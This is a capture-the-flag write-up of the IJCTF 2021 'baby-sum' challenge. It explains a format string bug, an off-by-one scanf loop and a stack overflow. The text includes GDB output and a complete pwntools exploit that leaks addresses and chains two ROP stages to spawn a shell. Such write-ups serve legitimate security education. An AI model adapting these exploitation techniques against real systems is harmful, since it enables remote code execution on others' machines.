###### tags: `ctf pwn` `IJCTF 2021` `format string`
# IJCTF2021 baby-sum
**Baby-sum** pwn challenge from IJCTF 2021.
The author for the challenge is **@whoamiT** and it is solved by **@thonk**.
## Sample running of binary

Take note of the **red** underline. The binary first takes in a name input and subsequent 3 number input.
## Vulnerability
There are 3 main vulnerabilities:
1) The first vulnerability is pretty obvious, there is a **format string** vulnerability.
2) The binary only intends to scan for the number **3 times**, but it does a wrong comparison at `calc+0x7A`. `JG` is used instead of `JGE`.
3) In the **third** scanf, the binary overwrites the **format** argument which is then used for the **fourth** scanf. This allows the attacker to input a very large format for the fourth scanf, causing a stack overflow.
The vulnerability block in IDA Pro is below:

## Exploitation
Looking at the sample binary output above, the program mentions that it only supports the input of **3 numbers**. In addition, we can see that the program indeed **ends** after 3 numbers.
### So how did the **fourth** scanf happen?
Refering to the IDA block above, at `calc+0x75`, there is a **comparison with 2**. The counter starts from **0**. So in the **third iteration**, the counter has a value of **2**. In the next line, the program did not take the intended jump to exit out of the loop. This is because the comparison is a **greater than 2** comparison. In this case, it will continue to do a fourth scanf.
However, the reason why the fourth scanf did not happen in a normal execution is because we did not give it a proper **format argument** for the fourth scanf. The program did run the fourth scanf. However after seeing the wrong format, it does not continue to take in user input. Hence, with the **invalid** format, we actually will not trigger the scanf. A proper format, for example `%10s` is required.
## GDB output for scanf
Note that in the 3rd scanf, the **destination address (rsi)** is used for the **format argument (rdi)** in the 4th scanf.
```
1st scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rsi = 0x00007fffffffe3d0 → 0x0000000000000000,
$rdx = 0x00007fffffffe3d0 → 0x0000000000000000
)
2nd scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rsi = 0x00007fffffffe3d8 → 0x0000000000000000,
$rdx = 0x00007fffffffe3d8 → 0x0000000000000000
)
3rd scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rsi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rdx = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?)
)
4th scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000007324333125 ("%13$s"?),
$rsi = 0x00007fffffffe3e8 → 0x00007fffffffe3c7 → 0x005555555552ff00,
$rdx = 0x00007fffffffe3e8 → 0x00007fffffffe3c7 → 0x005555555552ff00
)
```
In order to gain RIP control, we need to be able to trigger the **fourth scanf**. To do that, we need to choose a specific offset so that the program will not crash when we trigger the **printf format string**. This explains why the solution uses `%2$s`.
After fulfilling the above condition, it is easy to exploit with the below steps:
1) Leak PIE address
2) Overwrite RIP with ROP gadgets to leak LibC address
3) Stage 1 ROP leaks LibC and ends with a scanf
4) Stage 2 ROP is actual shell payload with the help of LibC leak
## Solution
Solution below credited to @thonk.
```
from pwn import *
conn = remote('35.244.10.136',10252)
elf = ELF('./baby-sum')
conn.recvuntil('generous leak for you: ')
stack_leak = int(conn.recvline().strip(),0)
print(f'Stack leak: {hex(stack_leak)}')
conn.sendline(b'A'*0x10 + b'B'*0x18 + p64(stack_leak+0x37)+b'A'*0x17)
conn.sendlineafter('> ',b'%6$p')
conn.recvuntil('> ')
pie_leak = int(conn.recvline().strip(),0)
pie_base = pie_leak - 0x10e0
pop_rdi = 0x00001433
pop_rsi = 0x00001431
print(f'Pie base: {hex(pie_base)}')
conn.sendlineafter('> ',b'%2$s')
rop_chain = [
pie_base + pop_rdi,
pie_base + elf.got['puts'],
pie_base + elf.sym.puts,
pie_base + pop_rdi,
stack_leak + 0x98,
pie_base + pop_rsi,
stack_leak + 0x80,
0x10,
pie_base + 0x00001138, #ret
pie_base + elf.sym.__isoc99_scanf
]
conn.sendlineafter('> ',b'B'*0x8 + b'C'*0x8 + p64(stack_leak)+b'D'*0x8 + flat(rop_chain,arch='amd64') + b'%s')
conn.recvlines(2)
binsh = 0x1b75aa
system = 0x55410
libc_leak = u64(conn.recvline().strip() + b'\0\0')
libc_base = libc_leak - 0x875a0
print(f'Libc leak: {hex(libc_base)}')
rop_chain_2 = [
b'A'*0x18,
pie_base + pop_rdi,
libc_base + binsh,
pie_base + 0x1138,
libc_base + system
]
conn.sendline(flat(rop_chain_2,arch='amd64'))
conn.interactive()
```
Solution and my own work can also be found here:
https://github.com/cddc12346/RandomCTFs/tree/master/IJCTF%202021/baby-sum
## Learning lessons:
- Always investigate function arguments.
- I took a while before catching on to the weird scanf arguments.
- Saw the weird scanf arguments but did not investigate further